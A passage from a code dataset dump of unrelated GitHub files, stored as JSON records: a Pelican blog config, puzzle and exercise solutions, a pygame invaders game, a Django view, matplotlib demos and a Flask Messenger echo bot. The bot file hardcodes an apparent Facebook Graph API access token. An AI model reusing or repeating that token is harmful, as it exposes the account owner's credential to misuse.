'Thomas Cole'\n# do we need this on the local site? seems links break without it\nSITEURL = 'http://localhost:8000'\n# Save the default index page as blog.html\nINDEX_SAVE_AS = 'blog/index.html'\n\n\n\n###########################################\n# ADDING STUFF TO MAKE MY CUSTOM THEME WORK - URLS and FILENAMES\nARTICLE_URL = '{date:%Y}/{date:%b}/{date:%d}/{slug}/'\nARTICLE_SAVE_AS = '{date:%Y}/{date:%b}/{date:%d}/{slug}/index.html'\nPAGE_URL = '{slug}'\nPAGE_SAVE_AS = '{slug}/index.html'\n\n# Make all the remaining URLs use the trailing slash without file extension\n\nARTICLE_LANG_URL = '{slug}-{lang}/'\n# I know these work\nAUTHOR_URL = 'author/{slug}/'\nAUTHOR_SAVE_AS = 'author/{slug}/index.html'\nCATEGORY_URL = 'category/{slug}/'\nCATEGORY_SAVE_AS = 'category/{slug}/index.html'\n\n# Not sure about these\nDRAFT_LANG_URL = 'drafts/{slug}-{lang}/'\nDRAFT_PAGE_LANG_URL = 'drafts/pages/{slug}-{lang}/'\nDRAFT_PAGE_URL = 'drafts/pages/{slug}/'\nDRAFT_URL = 'drafts/{slug}/'\nPAGE_LANG_URL = 'pages/{slug}-{lang}/'\nSTATIC_URL = '{path}/'\n\n# Test these\nTAG_URL = 'tag/{slug}/'\nTAG_SAVE_AS = 'tag/{slug}/index.html'\n\nYEAR_ARCHIVE_SAVE_AS = 'archives/{date:%Y}/index.html'\nMONTH_ARCHIVE_SAVE_AS = 'archives/{date:%Y}/{date:%b}/index.html'\nDAY_ARCHIVE_SAVE_AS = 'archives/{date:%Y}/{date:%b}/{date:%d}/index.html'\n\nYEAR_ARCHIVE_URL = 'archives/{date:%Y}/'\nMONTH_ARCHIVE_URL = 'archives/{date:%Y}/{date:%b}/'\nDAY_ARCHIVE_URL = 'archives/{date:%Y}/{date:%b}/{date:%d}/'\n\nARCHIVES_SAVE_AS = 'archives/index.html'\nARCHIVES_URL = 'archives/'\n\n# additional need to test\n# this should just be a list of all the tags\nTAGS_URL = 'tags/'\nTAGS_SAVE_AS = 'tags/index.html'\n\nAUTHORS_URL = 'authors/'\nAUTHORS_SAVE_AS = 'authors/index.html'\n\nCATEGORYS_URL = 'categories/'\nCATEGORYS_SAVE_AS = 'categories/index.html'\n\n# these seem to work now\nPAGINATION_PATTERNS = (\n(1, '{url}', '{name}{extension}'),\n(2, '{url}/{number}', '{name}{number}{extension}'),\n)\n\n###############################################\n\n\n# my modified theme based on tuxlite_tbs\nTHEME = \"themes/tuxlite_tbs_mod\"\n# display static pages from content/pages/ in the menu\nDISPLAY_PAGES_ON_MENU = False\n# use this list to get custom menu links\nMENUITEMS = (\n ('Home', ''),\n ('Projects', 'projects/'),\n ('Blog', 'blog/'),\n ('Hire Me!', 'contact/' )\n )\n\nPATH = 'content'\n\n# added static paths to get a logo in there and extra\nSTATIC_PATHS = [\n 'images',\n 'extra/favicon.ico',\n 'extra/robots.txt',\n]\n\nEXTRA_PATH_METADATA = {\n 'extra/robots.txt': {'path': 'robots.txt'},\n 'extra/favicon.ico': {'path': 'favicon.ico'}\n}\n\nSITELOGO = '/images/logo-03.svg'\n\nTIMEZONE = 'America/Los_Angeles'\n\nDEFAULT_LANG = 'en'\n\n# disable cache to see changes\nLOAD_CONTENT_CACHE = False\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n)\n\n# Social widget\nSOCIAL = (('GitHub', 'https://github.com/thomasjohncole'),\n ('LinkedIn', 'https://www.linkedin.com/in/thomas-john-cole'),\n ('Twitter', 'https://twitter.com/thomasjohncole'))\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n# RELATIVE_URLS = True","repo_name":"thomasjohncole/pelican","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"21627142128","text":"import re\n\ndef parseInstructions(instructions):\n output = []\n \n for instruction in instructions:\n parse = re.match(r'(\\w)(\\d+)', instruction)\n output.append((parse.group(1), int(parse.group(2))))\n\n return output\n\ndef part1(instructions):\n x, y = 0, 0\n currentDir = 90 # angle relative to north\n\n for action, amount in instructions:\n if action == 'N':\n y += amount\n elif action == 'S':\n y -= amount\n elif action == 'E':\n x += amount\n elif action == 'W':\n x -= amount\n elif action == 'L':\n currentDir = (currentDir - amount) % 360\n elif action == 'R':\n currentDir = (currentDir + amount) % 360\n elif action == 'F':\n if currentDir == 0:\n y += amount\n elif currentDir == 90:\n x += amount\n elif currentDir == 180:\n y -= amount\n elif currentDir == 270:\n x -= amount\n\n print(abs(x) + abs(y))\n\ndef part2(instructions):\n shipX, shipY = 0, 0\n wayX, wayY = 10, 1 # 10 units east and 1 north\n\n for action, amount in instructions:\n if action == 'N':\n wayY += amount\n elif action == 'S':\n wayY -= amount\n elif action == 'E':\n wayX += amount\n elif action == 'W':\n wayX -= amount\n elif action == 'L':\n for _ in range(amount // 90):\n wayX, wayY = -wayY, wayX\n elif action == 'R':\n for _ in range(amount // 90):\n wayX, wayY = wayY, -wayX\n elif action == 'F':\n for _ in range(amount):\n shipX += wayX\n shipY += wayY\n \n print(abs(shipX) + abs(shipY))\n\ninstructions = [line.strip() for line in open('day12/input.txt', 'r')]\nparsed = parseInstructions(instructions)\npart1(parsed)\npart2(parsed)","repo_name":"jac0bwilson/advent-of-code-2020","sub_path":"day12/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18120165001","text":"#!/usr/bin/env python3\nimport cv2 as cv\nimport numpy as np\n\ncolors = {}\nfor i in range(1, 50):\n index = i * 256 * 2 / 50\n is_green_blue = index < 256\n saturation = index % 256\n\n colors[i] = (0 if is_green_blue else saturation, saturation if is_green_blue else 255 - saturation, 255 - saturation if is_green_blue else 0)\n\nimage = np.zeros((1000, 1000, 3), dtype=np.uint8)\nfor i in range(10, 500):\n cv.circle(image, (500, 500), i, colors[i//10])\n\ncv.imshow(\"foo\", image)\ncv.waitKey(0)","repo_name":"xialinbo/CvTools","sub_path":"src/_test.py","file_name":"_test.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21202560606","text":"from rest_framework import generics\nfrom rest_framework.response import Response\n\nfrom products.models import Product\nfrom products.serializers import ProductSerializers\n\n\nclass SearchListView(generics.ListAPIView):\n queryset = Product.objects.all()\n serializer_class = ProductSerializers\n\n def get_queryset(self, *args, **kwargs):\n qs = super().get_queryset(*args, **kwargs)\n q = self.request.GET.get('q') # q는 검색할 keyword\n results = Product.objects.none() # none을 활용해 데이터베이스에 도달하지 않음, 결과가 없을 것으로 생각되면 사용\n if q is not None:\n user = None\n if self.request.user.is_authenticated:\n user = self.request.user\n results = qs.search(q, user=user)\n print(results)\n return results\n\n# class SearchListView(generics.GenericAPIView):\n# def get(self, request, *args, **kwargs):\n# user = None\n# if request.user.is_authenticated:\n# user = request.user.username\n# query = request.GET.get('q')\n# public = str(request.GET.get('public')) != \"0\"\n# tag = request.GET.get('tag') or None\n# if not query:\n# return Response('', status=400)\n# results = client.perform_search(query, tags=tag, user=user, public=public)\n# return Response(results)\n","repo_name":"SungMinWoo/Django_RestApi","sub_path":"Django-Rest-Framework-Tutorial/backend/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27558379617","text":"#!/usr/bin/python3\n\"\"\"\n2. First Rectangle\n\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"\n Rectangle Class\n \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" init - constructor method\n Args:\n id: identification object\n width: width size of a object\n height: height size of a object\n x: displacing in x\n y: displacing in y\n \"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\" width getter method\n Return:\n self.__width\n \"\"\"\n return self.__width\n\n @width.setter\n def width(self, width):\n \"\"\" width setter method\n Args:\n width: width size os a object\n \"\"\"\n if type(width) != int:\n raise TypeError(\"width must be an integer\")\n if width <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = width\n\n @property\n def height(self):\n \"\"\" height getter method\n Return:\n self.__height\n \"\"\"\n return self.__height\n\n @height.setter\n def height(self, height):\n \"\"\" height setter method\n Args:\n height: height size os a object\n \"\"\"\n if type(height) != int:\n raise TypeError(\"height must be an integer\")\n if height <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = height\n\n @property\n def x(self):\n \"\"\" x getter method\n Return:\n self.__x\n \"\"\"\n return self.__x\n\n @x.setter\n def x(self, x):\n \"\"\" x setter method\n Args:\n x: displacing in x\n \"\"\"\n if type(x) != int:\n raise TypeError(\"x must be an integer\")\n if x < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = x\n\n @property\n def y(self):\n \"\"\" y getter method\n Return:\n self.__y\n \"\"\"\n return self.__y\n\n @y.setter\n def y(self, y):\n \"\"\" x setter method\n Args:\n y: displacing in y\n \"\"\"\n if type(y) != int:\n raise TypeError(\"y must be an integer\")\n if y < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = y\n\n def area(self):\n \"\"\" area method\n Returns:\n a value of are of a object\n \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\" display method\n Returns:\n a value of are of a object\n \"\"\"\n print(\"\\n\" * self.__y, end=\"\")\n for row in range(self.__height):\n print(\" \" * self.__x, end=\"\")\n for col in range(self.__width):\n print(\"#\", end=\"\")\n print()\n\n def __str__(self):\n \"\"\" str method\n Returns: a string class value\n \"\"\"\n return \"[Rectangle] ({}) {:d}/{:d} - {:d}/{:d}\"\\\n .format(self.id, self.x, self.__y, self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" update method\n Args:\n args: When receives simple args\n kwargs: When receives key value args\n \"\"\"\n if args and args is not None and len(args) != 0:\n for i, arg in enumerate(args):\n if i == 0:\n self.id = arg\n elif i == 1:\n self.__width = arg\n elif i == 2:\n self.__height = arg\n elif i == 3:\n self.__x = arg\n elif i == 4:\n self.__y = arg\n elif kwargs and kwargs is not None and len(kwargs) != 0:\n for key, value in kwargs.items():\n if key == \"id\":\n self.id = value\n elif key == \"width\":\n self.__width = value\n elif key == \"height\":\n self.__height = value\n elif key == \"x\":\n self.__x = value\n elif key == \"y\":\n self.__y = value\n\n def to_dictionary(self):\n \"\"\" to_dictionary method\n \"\"\"\n return {\"id\": self.id,\n \"width\": self.__width,\n \"height\": self.__height,\n \"x\": self.__x,\n \"y\": self.__y}\n","repo_name":"faykris/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12120765683","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 1 20:50:29 2017\r\n\r\n@author: Max\r\n\"\"\"\r\n\r\nfrom flask import Flask, request\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\nACCESS_TOKEN = \"EAADgJ894XckBAAo3sXg6DOYgpQabVDzVoLGT43KZAwvIM59iBgvchbGKQq5YAvpN4rGAuZBMa5DnozzszdMZBNCZBjLPrpi2PTwJQWXmOkLbX7XbcMXxY50yOimwJLZCBeneGNzuy7gdSfG4GFwxkxmJCLnZBhnl5DzEcHsDtdvwZDZD\"\r\n\r\n\r\ndef reply(user_id, msg):\r\n data = {\r\n \"recipient\": {\"id\": user_id},\r\n \"message\": {\"text\": msg}\r\n }\r\n resp = requests.post(\"https://graph.facebook.com/v2.6/me/messages?access_token=\" + ACCESS_TOKEN, json=data)\r\n print(resp.content)\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef handle_incoming_messages():\r\n data = request.json\r\n sender = data['entry'][0]['messaging'][0]['sender']['id']\r\n message = data['entry'][0]['messaging'][0]['message']['text']\r\n reply(sender, message[::-1])\r\n return \"ok\"\r\n\r\n@app.route('/', methods=['GET'])\r\ndef handle_verification():\r\n return request.args['hub.challenge','']\r\n\r\n \r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"mhalik/chatbot","sub_path":"server_2.py","file_name":"server_2.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14651506760","text":"from reverse_input import reverse_dict\nimport unittest\n\nclass TestReverseDict(unittest.TestCase):\n \n def setUp(self):\n self.input_value = {\n 'hired': {\n 'be': {\n 'to': {\n 'deserve': 'I'\n }\n }\n }\n }\n \n self.output_value = {\n 'I': {\n 'deserve': {\n 'to': {\n 'be': 'hired'\n }\n }\n }\n }\n \n def test_reverse(self):\n self.assertEqual(reverse_dict(self.input_value), self.output_value)\n \nif __name__ == '__main__':\n unittest.main() # pragma: no cover\n \n ","repo_name":"athenayun/Unit-test","sub_path":"test_reverse_input.py","file_name":"test_reverse_input.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37191484983","text":"import pygame\nimport random\nimport math\nimport sys\n# -- Colours\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nBLUE = (50,50,255)\nYELLOW = (255,255,0)\nRED = (255,0,0)\n# -- Initialise PyGame\npygame.init()\n# -- Blank Screen\nsize = (640,480)\nscreen = pygame.display.set_mode(size)\n\n# -- Title of new window/screen\npygame.display.set_caption(\"Invaders\")\n\nscore = 0 \nlives = 3\n## -- Define the class snow which is a sprite\nclass Invader(pygame.sprite.Sprite):\n # Define the constructor for snow\n def __init__(self, color, width, height, speed):\n # Set the speed of the sprite\n self.speed = speed\n # Call the sprite constructor\n super().__init__()\n # Create a sprite and fill it with colour\n self.image = pygame.Surface([width,height])\n self.image.fill(color)\n \n # Set the position of the sprite\n self.rect = self.image.get_rect()\n self.rect.x = random.randrange(0, 600)\n self.rect.y = random.randrange(-150, 0)\n self.speed = 1\n #End Procedure\n def update(self):\n self.rect.y = self.rect.y + self.speed\n if self.rect.y > 480:\n self.rect.x = random.randrange(0, 600)\n self.rect.y = random.randrange(-150, 0)\n#End Class\n\n## -- Define the class snow which is a sprite\nclass Player(pygame.sprite.Sprite):\n # Define the constructor for snow\n def __init__(self, color, width, height):\n # Call the sprite constructor\n super().__init__()\n # Create a sprite and fill it with colour\n self.image = pygame.Surface([width,height])\n self.image.fill(color)\n pygame.draw.rect(self.image, color, [300, 400, width, height])\n # Set the position of the sprite\n self.rect = self.image.get_rect()\n self.rect.x = 300\n self.rect.y = 400\n self.speed = 1\n #End Procedure\n def update(self):\n if self.rect.x > 630:\n self.rect.x = 630\n elif self.rect.x < 0:\n self.rect.x = 0\n #endif\n\n def moveRight(self, speed):\n self.rect.x += speed\n #End Procedure\n \n def moveLeft(self, speed):\n self.rect.x -= speed\n #End Procedure\n \n#End Class\n#Define class for bullet\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, color, speed):\n #Call the sprite constructor\n super().__init__()\n self.image = pygame.Surface([2,2])\n self.image.fill(color)\n self.rect = self.image.get_rect()\n self.speed = speed\n self.rect.y = 400\n\n\n\n def update(self):\n self.rect.y -= self.speed\n if self.rect.y < 0:\n self.remove()\n\n\n\n \n# ------game over screen function\ndef game_over(score):\n done = False\n clock = pygame.time.Clock()\n while not done:\n # -- User input and controls\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN: # - a key is down\n if event.key == pygame.K_ESCAPE: # - if the escape key pressed\n pygame.quit()\n sys.exit()\n #End If\n #Next event\n\n # -- Draw game over screen\n screen.fill (BLACK)\n font = pygame.font.Font(None, 74)\n text1 = font.render('GAME OVER', 1, WHITE)\n text2 = font.render('SCORE:'+str(score), 1, WHITE)\n screen.blit(text1, (180,100))\n screen.blit(text2, (180,300))\n pygame.display.flip()\n clock.tick(60)\n\ndef game(score,lives):\n done = False\n # Create a list of the snow blocks\n invader_group = pygame.sprite.Group()\n player_group = pygame.sprite.Group()\n bullet_group = pygame.sprite.Group()\n # Create a list of all sprites\n all_sprites_group = pygame.sprite.Group()\n \n # -- Manages how fast screen refreshes\n clock = pygame.time.Clock() \n # Create the snowflakes\n number_of_invaders = 100 # we are creating 50 snowflakes\n for x in range (number_of_invaders):\n my_invader = Invader(BLUE, 10, 10, 1) # snowflakes are white with size 5 by 5 px\n invader_group.add(my_invader) # adds the new snowflake to the group of snowflakes\n all_sprites_group.add(my_invader) # adds it to the group of all Sprites\n #Next\n\n player = Player(YELLOW, 10, 10)\n player_group.add(player)\n all_sprites_group.add(player)\n ### -- Game Loop\n while not done:\n # -- User input and controls\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == pygame.KEYDOWN: # - a key is down\n if event.key == pygame.K_ESCAPE: # - if the escape key pressed\n done = True\n #End If\n #Next event\n\n #moving the player when the user presses a keyw\n \n keyup = pygame.key.get_pressed() # indented keyup, space can not be held to produce a bullet\n if keyup[pygame.K_SPACE]:\n bullet = Bullet(RED, 5)\n bullet_group.add(bullet)\n all_sprites_group.add(bullet)\n bullet.rect.x = (player.rect.x) + 4\n \n keys = pygame.key.get_pressed()\n if keys[pygame.K_a]:\n player.moveLeft(3)\n if keys[pygame.K_d]:\n player.moveRight(3)\n \n # -- Game logic goes after this comment\n all_sprites_group.update()\n player_hit_group = pygame.sprite.groupcollide(player_group,invader_group, True, True) \n if len(player_group) == 0: #If player group has zero sprites in it, then lives go down by 1 and the game resets\n lives -= 1\n if lives == 0:\n game_over(score)\n elif lives > 0: \n game(score,lives)\n if len(invader_group) == 0:\n game_over(score)\n if pygame.sprite.groupcollide(bullet_group, invader_group, True, True): #When a bullet hits an invader, gain 100 points\n score += 100\n\n # -- Screen background is BLACK\n screen.fill (BLACK)\n # -- Draw here\n all_sprites_group.draw(screen)\n # -- Display Score and Lives\n font = pygame.font.Font(None, 34)\n text = font.render('Score:'+str(score), 1, WHITE)\n screen.blit(text, (500,10))\n font = pygame.font.Font(None, 34)\n text = font.render('Lives:'+str(lives), 1, WHITE)\n screen.blit(text, (500,50))\n # -- flip display to reveal new position of objects\n pygame.display.flip()\n # - The clock ticks over\n clock.tick(60)\n #End While - End of game loop\n \n #End Function\ngame(score, lives)\npygame.quit()\n","repo_name":"KonDoran/doran-classwork","sub_path":"Invaders/invaders.py","file_name":"invaders.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22517314243","text":"from .merger import merge_docstrings\nfrom functools import partial\nfrom typing import Callable\n\n\ndef docmerge(obj: type | Callable | None = None, **kwargs):\n \"\"\"\n Merge docstrings from parent classes or functions with the current object's docstring.\n\n Parameters\n ----------\n obj : Union[type, callable, None], optional\n The object to merge the docstrings with. If None, returns a partial function with the `union` argument set.\n union : Union[str, None], optional\n Fields from docstring to merge together instead of overwriting. When used for the \"Parameters\" section, for instance,\n the parameters from the parent class will be merged with the parameters from the child class. If some parameter name\n is repeated, the child class parameter will be used.\n **kwargs : Any\n Any other keyword argument will be passed to the :func:`docmerge.merger.merge_docstrings` function.\n\n Returns\n -------\n Union[callable, partial]\n The merged docstring object.\n\n Examples\n --------\n >>> class Parent:\n ... '''This is the parent class docstring.'''\n ...\n >>> @docmerge\n ... class Child(Parent):\n ... '''This is the child class docstring.'''\n ...\n >>> print(Child.__doc__)\n \n This is the child class docstring.\n \n \"\"\"\n\n if obj is None:\n return partial(docmerge, **kwargs)\n\n if isinstance(obj, type):\n cls = obj\n parent = super(cls, cls)\n cls.__doc__ = merge_docstrings(parent.__doc__, cls.__doc__, **kwargs)\n elif callable(obj):\n func = obj\n return _MethodDocMerger(func, **kwargs)\n\n return obj\n\n\nclass _MethodDocMerger:\n def __init__(self, method, **kwargs) -> None:\n self.method = method\n self.kwargs = kwargs\n\n def __set_name__(self, owner, name):\n parent = super(owner, owner)\n parent_method = getattr(parent, name)\n\n self.method.__doc__ = merge_docstrings(\n parent_method.__doc__, self.method.__doc__, **self.kwargs\n )\n setattr(owner, name, self.method)\n","repo_name":"bressanmarcos/docmerge","sub_path":"docmerge/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25851093272","text":"import os, sys\nfrom PIL import Image\n\nsize_75 = (75,75)\ncounter = 1\nos.mkdir('./new_images')\n\nfor f in os.listdir('./images'):\n #outfile = os.path.splitext(f)[0] + \".png\"\n if f.endswith(\".jpg\"):\n # try:\n i = Image.open(f)\n i = i.convert(\"L\")\n i = i.crop((0,0,75,75))\n i = i.transpose(Image.ROTATE_270)\n outfile = \"./new_images/pic\" + str(counter).zfill(4) + \".png\" \n i.save(outfile,\"PNG\")\n counter+=1\n # print(i.size)\n # except IOError:\n # print(\"ERRLIN SUCKS\")","repo_name":"borisbho/PythonPractice","sub_path":"thumb_picture/thumb.py","file_name":"thumb.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74393760910","text":"# -*- coding: utf-8 -*-\n\nfrom Utils.Poisson import *\nfrom Utils.LineaRegression import *\nfrom Utils.LogisticRegression import *\nfrom Utils.RandomForest import *\nfrom matplotlib import pyplot\n\nhome = args.domicile\naway = args.exterieur\nexception(home, away)\nfonction = args.fonction\n\n\ndef main():\n if fonction == \"butsprobables\":\n n1 = butsprobablesdomicile(home, away)\n print(\"****************************************************************************************\")\n print(\" \" + home + \" est susceptible de marquer {} buts en moyenne dans ce match\".format(n1))\n print(\"****************************************************************************************\")\n n2 = butsprobablesexterieur(home, away)\n print(\"****************************************************************************************\")\n print(\" \" + away + \" est susceptible de marquer {} buts en moyenne dans ce match\".format(n2))\n print(\"****************************************************************************************\")\n liste = [n1, n2]\n pyplot.bar(range(2), liste, width=0.6, color='green',\n edgecolor='red', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [home, away],\n rotation=360)\n plt.xlabel(\"Equipes\")\n plt.ylabel(\"Buts Problables\")\n plt.title(\"Combien du buts dans cette confrontation?\")\n plt.show()\n elif fonction == \"graph\":\n resultgraph(home, away)\n elif fonction == \"entrainement\":\n traindata[\"FTR\"].value_counts().plot.pie(explode=[0.025, 0.025, 0.025], shadow=True,\n colors=['#ccff99', '#e65c00', '#6699ff'], autopct='%1.1f%%')\n plt.title(\"Visualisation des donnees d'entrainement\")\n plt.show()\n elif fonction == \"prediction\":\n predictdata[\"FTR\"].value_counts().plot.pie(explode=[0.025, 0.025, 0.025], shadow=True,\n colors=['#ccff99', '#e65c00', '#6699ff'], autopct='%1.1f%%')\n plt.title(\"Visualisation des donnees de prediction\")\n plt.show()\n elif fonction == \"attaque\":\n d = merged()\n h = d[home][\"AttaqueHome\"]\n a = d[away][\"AttaqueAway\"]\n print(\"************************************************\")\n print(\" \" + home + \" a pour force offensive {}\".format(h))\n print(\"*************************************************\")\n print(\"\\n\")\n print(\"************************************************\")\n print(\" \" + away + \" a pour force offensive {}\".format(a))\n print(\"*************************************************\")\n liste = [h, a]\n pyplot.bar(range(2), liste, width=0.6, color='red',\n edgecolor='green', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [home, away],\n rotation=360)\n plt.xlabel(\"Equipes\")\n plt.ylabel(\"Force Offensive\")\n plt.title(\"Comparaison des forces d'attaque\")\n plt.show()\n elif fonction == \"defense\":\n d = merged()\n h = d[home][\"DefenseHome\"]\n a = d[away][\"DefenseAway\"]\n print(\"************************************************\")\n print(\" \" + home + \" a pour force défensive {}\".format(h))\n print(\"*************************************************\")\n print(\"\\n\")\n print(\"************************************************\")\n print(\" \" + away + \" a pour force défensive {}\".format(a))\n print(\"*************************************************\")\n liste = [h, a]\n pyplot.bar(range(2), liste, width=0.6, color='blue',\n edgecolor='green', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [home, away],\n rotation=360)\n plt.xlabel(\"Equipes\")\n plt.ylabel(\"Force Defensive\")\n plt.title(\"Comparaison des forces de defense\")\n plt.show()\n elif fonction == \"goals\":\n d = merged()\n h = d[home][\"ButsHome\"]\n a = d[away][\"ButsAway\"]\n liste = [h, a]\n print(liste)\n pyplot.bar(range(2), liste, width=0.6, color='pink',\n edgecolor='green', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [\"Domicile\", \"Exterieur\"],\n rotation=360)\n plt.xlabel(\"Lieu du match\")\n plt.ylabel(\"Nombre de buts\")\n plt.title(\"Nombre de buts a domicile VS Nombre de buts a l'exterieur\")\n plt.show()\n elif fonction == \"precision\":\n liste = [pprecision(), rprecision(), linearprecision(), logisticprecision()]\n pyplot.bar(range(4), liste, width=0.6, color='black',\n edgecolor='green', linewidth=2, yerr=[0.5, 1, 2, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(5)], ['Poisson', 'Random', 'Linear', 'Logistic'],\n rotation=360)\n plt.xlabel(\"Methodes\")\n plt.ylabel(\"Precision\")\n plt.title(\"Comparaison des methodes\")\n plt.show()\n else:\n print(\"POISSON:\")\n print(\"\\n\")\n chaine = pfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n print(\"RANDOM FOREST:\")\n print(\"\\n\")\n chaine = rfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n print(\"LINEAR SVC:\")\n print(\"\\n\")\n chaine = linearfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n print(\"LOGISTIC REGRESSION:\")\n print(\"\\n\")\n chaine = logisticfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CazabetLyon1/SoccerPrediction","sub_path":"Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12065400105","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport time\n\nrandom.seed(9)\nx_data = np.array([-3, -1, 1, 3]).reshape(-1, 1)\ny_data = np.array([3, 4.5, 4.5, 5.5]).reshape(-1, 1)\n\n\ndef model(x):\n global m, c\n y = m * x + c\n return y\n\n\nm = random.uniform(-1, 1)\nc = 0\ny_init = model(x_data)\nfig = plt.figure()\nplt.axis([-4, 4, -1, 7])\nplt.scatter(x_data, y_data)\nplt.plot(x_data, y_init)\nplt.draw()\nlearn_rate = 0.01\niterations = 100\nfor i in range(iterations):\n plt.clf()\n for i, j in zip(x_data, y_data):\n y = model(i)\n error = j - y\n m += learn_rate * error * i\n c += learn_rate * error\n\n y_next = model(x_data)\n plt.plot(x_data, y_next)\n plt.scatter(x_data, y_data)\n\n plt.plot(x_data, y_init)\n\n plt.pause(0.001)\n\n\nplt.show()\n\n\n\"\"\"\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef tellme(s):\n print(s)\n plt.title(s, fontsize=16)\n plt.draw()\n\n\nplt.clf()\nplt.setp(plt.gca(), autoscale_on=False)\n\ntellme(\"You will define a triangle, click to begin\")\n\nplt.waitforbuttonpress()\n\nwhile True:\n pts = []\n while len(pts) < 3:\n tellme(\"Select 3 corners with mouse\")\n pts = np.asarray(plt.ginput(3, timeout=-1))\n if len(pts) < 3:\n tellme(\"Too few points, starting over\")\n time.sleep(1) # Wait a second\n\n ph = plt.fill(pts[:, 0], pts[:, 1], \"r\", lw=2)\n\n tellme(\"Happy? Key click for yes, mouse click for no\")\n\n if plt.waitforbuttonpress():\n break\n\n # Get rid of fill\n for p in ph:\n p.remove()\n\n\n# Define a nice function of distance from individual pts\ndef f(x, y, pts):\n z = np.zeros_like(x)\n for p in pts:\n z = z + 1 / (np.sqrt((x - p[0]) ** 2 + (y - p[1]) ** 2))\n return 1 / z\n\n\nX, Y = np.meshgrid(np.linspace(-1, 1, 51), np.linspace(-1, 1, 51))\nZ = f(X, Y, pts)\n\nCS = plt.contour(X, Y, Z, 20)\n\ntellme(\"Use mouse to select contour label locations, middle button to finish\")\nCL = plt.clabel(CS, manual=True)\ntellme(\"Now do a nested zoom, click to begin\")\nplt.waitforbuttonpress()\n\nwhile True:\n tellme(\"Select two corners of zoom, middle mouse button to finish\")\n pts = plt.ginput(2, timeout=-1)\n if len(pts) < 2:\n break\n (x0, y0), (x1, y1) = pts\n xmin, xmax = 